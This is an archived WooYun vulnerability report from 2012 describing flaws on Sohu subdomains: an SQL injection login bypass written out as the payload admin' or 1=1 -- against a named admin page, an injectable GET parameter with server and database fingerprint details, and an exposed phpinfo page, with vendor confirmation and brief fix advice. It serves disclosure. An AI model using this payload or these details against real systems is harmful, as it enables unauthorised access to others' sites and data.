当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09241

漏洞标题:搜狐分站SQL注入漏洞+phpinfo信息

相关厂商:搜狐

漏洞作者: ckaexn

提交时间:2012-07-05 13:42

修复时间:2012-08-19 13:43

公开时间:2012-08-19 13:43

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-05: 细节已通知厂商并且等待厂商处理中
2012-07-05: 厂商已经确认,细节仅向厂商公开
2012-07-15: 细节向核心白帽子及相关领域专家公开
2012-07-25: 细节向普通白帽子公开
2012-08-04: 细节向实习白帽子公开
2012-08-19: 细节向公众公开

简要描述:

搜狐某后台SQL注入漏洞,另外一分站点GET方法注入,还有一个phpinfo信息。

详细说明:

1. 后台SQL注入
某分站http://stock.business.sohu.com/publish/login.php
使用用户名:admin' or 1=1 -- 密码任意可以进入后台进行投稿操作。


2. http://product.news.sohu.com/news/s7/show.php?name=5
注入点,有问题的参数是name,可获取数据库相关信息。

Host IP:123.125.116.190
Web Server: nginx/1.0.5
Powered-by: PHP/5.3.10
DB Server: MySQL
Current DB: military


3. phpinfo()信息泄漏
http://q.fund.sohu.com/phpinfo.php

漏洞证明:

1. 后台SQL注入
某分站http://stock.business.sohu.com/publish/login.php
使用用户名:admin' or 1=1 -- 密码任意可以进入后台进行投稿操作。


2. http://product.news.sohu.com/news/s7/show.php?name=5
注入点,有问题的参数是name,可获取数据库相关信息。

Host IP:123.125.116.190
Web Server: nginx/1.0.5
Powered-by: PHP/5.3.10
DB Server: MySQL
Current DB: military


3. phpinfo()信息泄漏
http://q.fund.sohu.com/phpinfo.php

修复方案:

1. 过滤字符。
2. 删除phpinfo文件。

版权声明:转载请注明来源 ckaexn@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-07-05 14:44

厂商回复:

thanks alot

最新状态:

暂无


漏洞评价:

评论

  1. 2012-09-14 13:03 | ckaexn ( 路人 | Rank:17 漏洞数:2 | ~)

    @ckaexn